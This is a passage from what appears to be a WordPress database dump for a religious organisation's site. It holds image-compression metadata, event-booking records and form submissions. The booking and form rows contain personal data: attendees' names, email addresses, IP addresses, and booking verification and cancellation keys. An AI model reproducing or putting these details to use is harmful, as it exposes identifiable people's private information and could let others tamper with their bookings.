WP-Optimize'),(164673,254570,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14293;s:12:\"smushed-size\";i:13567;s:15:\"savings-percent\";d:5.0800000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:14293;s:10:\"compressed\";i:13567;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13337;s:10:\"compressed\";i:12203;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2301;s:10:\"compressed\";i:1880;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11442;s:10:\"compressed\";i:10493;}}}'),(164674,254571,'original-file','2020/01/spiritual-experiences-guidebook-updraft-pre-smush-original.jpg'),(164675,254571,'smush-complete','1'),(164676,254571,'smush-info','The file was compressed from 13.71 KB to 13.01 KB saving 5.12 percent using WP-Optimize'),(164677,254571,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14037;s:12:\"smushed-size\";i:13318;s:15:\"savings-percent\";d:5.12000000000000010658141036401502788066864013671875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:14037;s:10:\"compressed\";i:13318;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12209;s:10:\"compressed\";i:11146;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2123;s:10:\"compressed\";i:1707;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11983;s:10:\"compressed\";i:10868;}}}'),(164678,254572,'original-file','2020/01/stories-of-past-lives-dreams-and-soul-travel-updraft-pre-smush-original.jpg'),(164679,254572,'smush-complete','1'),(164680,254572,'smush-info','The file was compressed from 12.19 KB to 11.57 KB saving 5.06 percent using WP-Optimize'),(164681,254572,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12484;s:12:\"smushed-size\";i:11852;s:15:\"savings-percent\";d:5.05999999999999960920149533194489777088165283203125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12484;s:10:\"compressed\";i:11852;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11785;s:10:\"compressed\";i:10737;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2171;s:10:\"compressed\";i:1755;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11559;s:10:\"compressed\";i:10529;}}}'),(164682,254573,'original-file','2020/01/stranger-by-the-river-updraft-pre-smush-original.jpg'),(164683,254573,'smush-complete','1'),(164684,254573,'smush-info','The file was compressed from 18.54 KB to 14.63 KB saving 21.11 percent using WP-Optimize'),(164685,254573,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:18986;s:12:\"smushed-size\";i:14979;s:15:\"savings-percent\";d:21.1099999999999994315658113919198513031005859375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:18986;s:10:\"compressed\";i:14979;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15052;s:10:\"compressed\";i:13649;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2188;s:10:\"compressed\";i:1783;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14538;s:10:\"compressed\";i:13127;}}}'),(164686,254574,'original-file','2020/01/the-call-of-soul-updraft-pre-smush-original.jpg'),(164687,254574,'smush-complete','1'),(164688,254574,'smush-info','The file was compressed from 12.00 KB to 11.52 KB saving 4.06 percent using WP-Optimize'),(164689,254574,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12293;s:12:\"smushed-size\";i:11794;s:15:\"savings-percent\";d:4.05999999999999960920149533194489777088165283203125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12293;s:10:\"compressed\";i:11794;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12104;s:10:\"compressed\";i:11074;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2198;s:10:\"compressed\";i:1775;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11170;s:10:\"compressed\";i:10211;}}}'),(164690,254575,'original-file','2020/01/the-flute-of-god-updraft-pre-smush-original.jpg'),(164691,254575,'smush-complete','1'),(164692,254575,'smush-info','The file was compressed from 8.61 KB to 8.07 KB saving 6.25 percent using WP-Optimize'),(164693,254575,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:8812;s:12:\"smushed-size\";i:8261;s:15:\"savings-percent\";d:6.25;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:8812;s:10:\"compressed\";i:8261;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8308;s:10:\"compressed\";i:7609;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1766;s:10:\"compressed\";i:1360;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:8636;s:10:\"compressed\";i:7937;}}}'),(164694,254576,'original-file','2020/01/the-living-word-book-4-updraft-pre-smush-original.jpg'),(164695,254576,'smush-complete','1'),(164696,254576,'smush-info','The file was compressed from 14.56 KB to 13.38 KB saving 8.13 percent using WP-Optimize'),(164697,254576,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14908;s:12:\"smushed-size\";i:13696;s:15:\"savings-percent\";d:8.1300000000000007815970093361102044582366943359375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:14908;s:10:\"compressed\";i:13696;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10915;s:10:\"compressed\";i:10165;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1804;s:10:\"compressed\";i:1385;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11169;s:10:\"compressed\";i:10363;}}}'),(164698,254579,'original-file','2020/01/the-slow-burning-love-of-god-updraft-pre-smush-original.jpg'),(164699,254579,'smush-complete','1'),(164700,254579,'smush-info','The file was compressed from 16.06 KB to 12.32 KB saving 23.28 percent using WP-Optimize'),(164701,254579,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:16445;s:12:\"smushed-size\";i:12616;s:15:\"savings-percent\";d:23.280000000000001136868377216160297393798828125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:16445;s:10:\"compressed\";i:12616;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11058;s:10:\"compressed\";i:10252;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2034;s:10:\"compressed\";i:1632;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10601;s:10:\"compressed\";i:9747;}}}'),(164702,254580,'original-file','2020/01/the-sound-of-soul-updraft-pre-smush-original.jpg'),(164703,254580,'smush-complete','1'),(164704,254580,'smush-info','The file was compressed from 12.10 KB to 11.49 KB saving 5.07 percent using WP-Optimize'),(164705,254580,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12389;s:12:\"smushed-size\";i:11761;s:15:\"savings-percent\";d:5.07000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12389;s:10:\"compressed\";i:11761;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10185;s:10:\"compressed\";i:9354;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2145;s:10:\"compressed\";i:1716;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:9952;s:10:\"compressed\";i:9228;}}}'),(164706,254581,'original-file','2020/01/the-spiritual-laws-of-ECK-updraft-pre-smush-original.jpg'),(164707,254581,'smush-complete','1'),(164708,254581,'smush-info','The file was compressed from 11.49 KB to 10.92 KB saving 4.91 percent using WP-Optimize'),(164709,254581,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11761;s:12:\"smushed-size\";i:11184;s:15:\"savings-percent\";d:4.910000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:11761;s:10:\"compressed\";i:11184;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12531;s:10:\"compressed\";i:11585;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2023;s:10:\"compressed\";i:1626;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11304;s:10:\"compressed\";i:10406;}}}'),(164710,254582,'original-file','2020/01/the-tigers-fang-updraft-pre-smush-original.jpg'),(164711,254582,'smush-complete','1'),(164712,254582,'smush-info','The file was compressed from 13.26 KB to 12.50 KB saving 5.73 percent using WP-Optimize'),(164713,254582,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:13577;s:12:\"smushed-size\";i:12799;s:15:\"savings-percent\";d:5.730000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:13577;s:10:\"compressed\";i:12799;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13622;s:10:\"compressed\";i:12412;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2478;s:10:\"compressed\";i:2029;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:12795;s:10:\"compressed\";i:11619;}}}'),(164714,254583,'original-file','2020/01/those-wonderful-eck-masters-updraft-pre-smush-original.jpg'),(164715,254583,'smush-complete','1'),(164716,254583,'smush-info','The file was compressed from 17.78 KB to 16.83 KB saving 5.33 percent using WP-Optimize'),(164717,254583,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:18203;s:12:\"smushed-size\";i:17233;s:15:\"savings-percent\";d:5.3300000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:18203;s:10:\"compressed\";i:17233;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14819;s:10:\"compressed\";i:13566;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2053;s:10:\"compressed\";i:1651;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14728;s:10:\"compressed\";i:13428;}}}'),(164718,254584,'original-file','2020/01/wisdom-of-the-heart-book-1-updraft-pre-smush-original.jpg'),(164719,254584,'smush-complete','1'),(164720,254584,'smush-info','The file was compressed from 11.34 KB to 10.88 KB saving 4.11 percent using WP-Optimize'),(164721,254584,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11614;s:12:\"smushed-size\";i:11137;s:15:\"savings-percent\";d:4.11000000000000031974423109204508364200592041015625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:11614;s:10:\"compressed\";i:11137;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10061;s:10:\"compressed\";i:9245;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2197;s:10:\"compressed\";i:1734;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11107;s:10:\"compressed\";i:10159;}}}'),(164722,254585,'original-file','2020/01/wisdom-of-the-heart-book-3-updraft-pre-smush-original.jpg'),(164723,254585,'smush-complete','1'),(164724,254585,'smush-info','The file was compressed from 11.89 KB to 11.28 KB saving 5.1 percent using WP-Optimize'),(164725,254585,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12171;s:12:\"smushed-size\";i:11550;s:15:\"savings-percent\";d:5.0999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12171;s:10:\"compressed\";i:11550;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10210;s:10:\"compressed\";i:9280;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2285;s:10:\"compressed\";i:1815;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11137;s:10:\"compressed\";i:10049;}}}'),(164726,254586,'original-file','2020/01/youth-ask-a-modern-prophet-updraft-pre-smush-original.jpg'),(164727,254586,'smush-complete','1'),(164728,254586,'smush-info','The file was compressed from 14.82 KB to 14.01 KB saving 5.48 percent using WP-Optimize'),(164729,254586,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:15175;s:12:\"smushed-size\";i:14343;s:15:\"savings-percent\";d:5.480000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:15175;s:10:\"compressed\";i:14343;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14505;s:10:\"compressed\";i:13049;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2424;s:10:\"compressed\";i:1969;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:13964;s:10:\"compressed\";i:12591;}}}'),(164730,254622,'original-file','2020/01/the-sound-of-soul-updraft-pre-smush-original.png'),(164731,254622,'smush-complete','1'),(164732,254622,'smush-info','The file was compressed from 91.56 KB to 29.62 KB saving 67.65 percent using WP-Optimize'),(164733,254622,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:93760;s:12:\"smushed-size\";i:30333;s:15:\"savings-percent\";d:67.650000000000005684341886080801486968994140625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:93760;s:10:\"compressed\";i:30333;}s:6:\"medium\";a:2:{s:8:\"original\";i:64375;s:10:\"compressed\";i:20986;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:31251;s:10:\"compressed\";i:11328;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:4160;s:10:\"compressed\";i:2546;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:74797;s:10:\"compressed\";i:26350;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:47009;s:10:\"compressed\";i:15213;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:83834;s:10:\"compressed\";i:27336;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:45386;s:10:\"compressed\";i:15666;}}}'),(164734,266605,'original-file','2022/04/those-wonderful-eck-masters-lscape-1-updraft-pre-smush-original.jpg'),(164735,266605,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:54998;s:12:\"smushed-size\";i:52936;s:15:\"savings-percent\";d:3.75;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:54998;s:10:\"compressed\";i:52936;}s:6:\"medium\";a:2:{s:8:\"original\";i:11382;s:10:\"compressed\";i:11382;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5462;s:10:\"compressed\";i:5462;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16119;s:10:\"compressed\";i:16119;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:28129;s:10:\"compressed\";i:27937;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:20906;s:10:\"compressed\";i:20862;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18927;s:10:\"compressed\";i:18927;}}}'),(164736,266612,'original-file','2022/05/wisdom-of-the-heart-lscape-1-updraft-pre-smush-original.jpg'),(164737,266612,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:56569;s:12:\"smushed-size\";i:55031;s:15:\"savings-percent\";d:2.720000000000000195399252334027551114559173583984375;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:56569;s:10:\"compressed\";i:55031;}s:6:\"medium\";a:2:{s:8:\"original\";i:11110;s:10:\"compressed\";i:11110;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5277;s:10:\"compressed\";i:5277;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:15807;s:10:\"compressed\";i:15807;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:26458;s:10:\"compressed\";i:26458;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19101;s:10:\"compressed\";i:19101;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18143;s:10:\"compressed\";i:18143;}}}'),(164738,266627,'original-file','2022/05/arahata-circle-1-updraft-pre-smush-original.jpg'),(164739,266627,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:163036;s:12:\"smushed-size\";i:155517;s:15:\"savings-percent\";d:4.61000000000000031974423109204508364200592041015625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:163036;s:10:\"compressed\";i:155517;}s:6:\"medium\";a:2:{s:8:\"original\";i:20644;s:10:\"compressed\";i:20196;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9901;s:10:\"compressed\";i:9835;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:109527;s:10:\"compressed\";i:106577;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:34377;s:10:\"compressed\";i:33377;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:56459;s:10:\"compressed\";i:54748;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:38815;s:10:\"compressed\";i:37647;}s:8:\"tileview\";a:2:{s:8:\"original\";i:41266;s:10:\"compressed\";i:40147;}}}'),(164740,266752,'original-file','2022/05/ek-logo-med-blue-updraft-pre-smush-original.png'),(164741,266752,'smush-complete','1'),(164742,266752,'smush-info','The file was compressed from 4.22 KB to 2.54 KB saving 39.81 percent using WP-Optimize'),(164743,266752,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:4326;s:12:\"smushed-size\";i:2604;s:15:\"savings-percent\";d:39.81000000000000227373675443232059478759765625;s:10:\"sizes-info\";a:1:{s:4:\"full\";a:2:{s:8:\"original\";i:4326;s:10:\"compressed\";i:2604;}}}'),(164744,45842,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(164745,266794,'mec_transaction_id','FYW24835'),(164746,266794,'mec_user_id','1000029'),(164747,266794,'mec_verified','1'),(164748,266794,'mec_verification_key','94a6c8a261efb12f6c993466bd54713a'),(164749,266794,'mec_cancellation_key','82b51acf80f2c2aceba321b6c27d9be3'),(164750,266794,'mec_confirmed','1'),(164751,266794,'mec_event_id','266604'),(164752,266794,'mec_date','1655639100:1655643600'),(164753,266794,'mec_ticket_id',',1,'),(164754,266794,'mec_booking_time','2022-06-17 14:17:06'),(164755,266794,'mec_all_dates','a:0:{}'),(164756,266794,'mec_other_dates','a:0:{}'),(164757,266794,'mec_attention_time','1655639100:1655643600'),(164758,266794,'mec_attention_time_start','1655639100'),(164759,266794,'mec_attention_time_end','1655643600'),(164760,266794,'mec_book_date_submit','20220617141706'),(164761,266794,'mec_booking_location','118'),(164762,266794,'mec_ticket_price_1','0'),(164763,266794,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"160.113.20.2\";}}'),(164764,266794,'mec_price','0'),(164765,266794,'mec_gateway','MEC_gateway_free'),(164766,266794,'mec_gateway_label','Free'),(164767,266795,'mec_transaction_id','JBU21686'),(164768,266795,'mec_user_id','1000029'),(164769,266795,'mec_verified','1'),(164770,266795,'mec_verification_key','5b2a98cca07f0f983814b73bbcb943c0'),(164771,266795,'mec_cancellation_key','48960f05ca93339496c5c71e2212026c'),(164772,266795,'mec_confirmed','1'),(164773,266795,'mec_event_id','266611'),(164774,266795,'mec_date','1655838000:1655841600'),(164775,266795,'mec_ticket_id',',1,'),(164776,266795,'mec_booking_time','2022-06-17 14:19:35'),(164777,266795,'mec_all_dates','a:0:{}'),(164778,266795,'mec_other_dates','a:0:{}'),(164779,266795,'mec_attention_time','1655838000:1655841600'),(164780,266795,'mec_attention_time_start','1655838000'),(164781,266795,'mec_attention_time_end','1655841600'),(164782,266795,'mec_book_date_submit','20220617141935'),(164783,266795,'mec_booking_location','144'),(164784,266795,'mec_ticket_price_1','0'),(164785,266795,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"160.113.20.2\";}}'),(164786,266795,'mec_price','0'),(164787,266795,'mec_gateway','MEC_gateway_free'),(164788,266795,'mec_gateway_label','Free'),(164789,266796,'mec_transaction_id','GFQ26947'),(164790,266796,'mec_user_id','1000029'),(164791,266796,'mec_verified','1'),(164792,266796,'mec_verification_key','d49be352eb0cd67971ed36e5ff244ada'),(164793,266796,'mec_cancellation_key','4ba4174b3ee81790460c0ff7fb3899c5'),(164794,266796,'mec_confirmed','1'),(164795,266796,'mec_event_id','266604'),(164796,266796,'mec_date','1658058300:1658062800'),(164797,266796,'mec_ticket_id',',1,'),(164798,266796,'mec_booking_time','2022-06-17 14:23:41'),(164799,266796,'mec_all_dates','a:0:{}'),(164800,266796,'mec_other_dates','a:0:{}'),(164801,266796,'mec_attention_time','1658058300:1658062800'),(164802,266796,'mec_attention_time_start','1658058300'),(164803,266796,'mec_attention_time_end','1658062800'),(164804,266796,'mec_book_date_submit','20220617142341'),(164805,266796,'mec_booking_location','118'),(164806,266796,'mec_ticket_price_1','0'),(164807,266796,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"160.113.20.2\";}}'),(164808,266796,'mec_price','0'),(164809,266796,'mec_gateway','MEC_gateway_free'),(164810,266796,'mec_gateway_label','Free'),(164811,266797,'_field_133','howard '),(164812,266797,'_field_134','hancock'),(164813,266797,'_field_135','h.hancock@apex.net'),(164814,266797,'_field_137','How Bible Prophecy Gives Us Perspective'),(164815,266797,'_field_138','How Bible Prophecy Gives Us Perspective\nby Pastor Greg Laurie \n\n“God blesses the one who reads the words of this prophecy to the church, and he blesses all who listen to its message and obey what it says, for the time is near.”\n—Revelation 1:3\n\nHave you ever wondered what will happen in the future? Have you ever wished you could see what will take place? In some ways, I’m glad I don’t know the future. God knows the future, I know Him, and that’s enough.\n\nThe book of Revelation, however, gives us a glimpse into the future. In fact, the Bible says there’s a special blessing promised to those who hear and keep the words of this book (see Revelation 1:3).\n\nRevelation means “the unveiling,” because it is not God’s desire to conceal but to reveal. And one thing I’ve learned from studying this great book is that God has a plan, and everything is right on schedule. I’ve also discovered that the best is yet to come, and as followers of Jesus Christ, we win in the end.\n\nWhen we study Revelation, and Bible prophecy in general, we gain perspective. When we learn about the future, it motivates us to live righteously in the present. And how we view the future is important. If we believe that Jesus could return at any moment, it will affect the way that we live.\n\nFor instance, when you were a child and did something wrong, maybe your mother said, “Just wait until your father gets home!” Did you look forward to his arrival?\n\nNo, you didn’t. When you heard his car pull into the driveway and knew he was walking up to the door, you were afraid.\n\nOn the other hand, if you were good and didn’t get into trouble that day, you could hardly wait until your father got home.\n\nNow let’s apply that to the Lord’s return. If we’re right with God, then we’re looking forward to it. But if we’ve disobeyed Him, then maybe we’re dreading it.\n\nOur belief in the imminent return of Jesus has an effect on us and on the way we live.\n\n\n\n\n\n\n\n\n\n\n'),(164816,266797,'_form_id','13'),(164817,266797,'_seq_num','111'),(164818,266798,'_field_179','Belinda '),(164819,266798,'_field_180','Eskin'),(164820,266798,'_field_181','eskinchiro@aol.com'),(164821,266798,'_field_182','CO'),(164822,266798,'_field_183','US'),(164823,266798,'_field_184','a:2:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";i:1;s:8:\"Loveland\";}'),(164824,266798,'_form_id','17'),(164825,266798,'_seq_num','10'),(164826,266799,'mec_transaction_id','OKA60338'),(164827,266799,'mec_user_id','1000030'),(164828,266799,'mec_verified','1'),(164829,266799,'mec_verification_key','7bc64874d58f7a2ec342738b53506d71'),(164830,266799,'mec_cancellation_key','17c4cff1291735a2e13cd7ceae9711e7'),(164831,266799,'mec_confirmed','1'),(164832,266799,'mec_event_id','266604'),(164833,266799,'mec_date','1655639100:1655643600'),(164834,266799,'mec_ticket_id',',1,'),(164835,266799,'mec_booking_time','2022-06-19 08:34:06'),(164836,266799,'mec_all_dates','a:0:{}'),(164837,266799,'mec_other_dates','a:0:{}'),(164838,266799,'mec_attention_time','1655639100:1655643600'),(164839,266799,'mec_attention_time_start','1655639100'),(164840,266799,'mec_attention_time_end','1655643600'),(164841,266799,'mec_book_date_submit','20220619083406'),(164842,266799,'mec_booking_location','118'),(164843,266799,'mec_ticket_price_1','0'),(164844,266799,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:25:\"marilynmillarhu@gmail.com\";s:4:\"name\";s:14:\"Marilyn Millar\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"98.50.104.233\";}}'),(164845,266799,'mec_price','0'),(164846,266799,'mec_gateway','MEC_gateway_free'),(164847,266799,'mec_gateway_label','Free'),(166734,266887,'mec_attention_time','1661082300:1661086800'),(166735,266887,'mec_attention_time_start','1661082300'),(166736,266887,'mec_attention_time_end','1661086800'),(166737,266887,'mec_book_date_submit','20220718161454'),(166729,266887,'mec_date','1661082300:1661086800'),(166730,266887,'mec_ticket_id',',1,'),(166731,266887,'mec_booking_time','2022-07-18 16:14:54'),(166697,266885,'mec_price','0'),(166698,266885,'mec_gateway','MEC_gateway_free'),(166699,266885,'mec_gateway_label','Free'),(166700,266886,'mec_transaction_id','FGJ98579'),(166701,266886,'mec_user_id','1000036'),(166702,266886,'mec_verified','1'),(166703,266886,'mec_verification_key','59494c734678cc5eda15dbf72f815e84'),(166704,266886,'mec_cancellation_key','0d5165dcb4454dd385cf2d246c39ef2c'),(166705,266886,'mec_confirmed','1'),(166706,266886,'mec_event_id','266611'),(166707,266886,'mec_date','1660676400:1660680000'),(166708,266886,'mec_ticket_id',',1,'),(166709,266886,'mec_booking_time','2022-07-18 11:31:34'),(166710,266886,'mec_all_dates','a:0:{}'),(166711,266886,'mec_other_dates','a:0:{}'),(166712,266886,'mec_attention_time','1660676400:1660680000'),(166713,266886,'mec_attention_time_start','1660676400'),(166714,266886,'mec_attention_time_end','1660680000'),(166715,266886,'mec_book_date_submit','20220718113134'),(166716,266886,'mec_booking_location','144'),(166717,266886,'mec_ticket_price_1','0'),(166718,266886,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"47.12.99.86\";}}'),(166719,266886,'mec_price','0'),(166720,266886,'mec_gateway','MEC_gateway_free'),(166681,266885,'mec_verification_key','05e18baba9fa43a991d54a148494b55b'),(166682,266885,'mec_cancellation_key','2425fbcd42122de8b195ff92b6265480'),(166683,266885,'mec_confirmed','1'),(166684,266885,'mec_event_id','266611'),(166685,266885,'mec_date','1658257200:1658260800'),(166686,266885,'mec_ticket_id',',1,'),(166687,266885,'mec_booking_time','2022-07-18 11:20:31'),(166688,266885,'mec_all_dates','a:0:{}'),(166689,266885,'mec_other_dates','a:0:{}'),(166690,266885,'mec_attention_time','1658257200:1658260800'),(166691,266885,'mec_attention_time_start','1658257200'),(166692,266885,'mec_attention_time_end','1658260800'),(166693,266885,'mec_book_date_submit','20220718112031'),(166694,266885,'mec_booking_location','144'),(166695,266885,'mec_ticket_price_1','0'),(166696,266885,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"47.12.99.86\";}}'),(166679,266885,'mec_user_id','1000036'),(166680,266885,'mec_verified','1'),(166678,266885,'mec_transaction_id','RPJ12773'),(166674,266884,'original-file','2022/07/blu-butterfly-1-updraft-pre-smush-original.jpg'),(166675,266884,'smush-info','The file was compressed from 110.01 KB to 106.46 KB saving 3.23 percent using 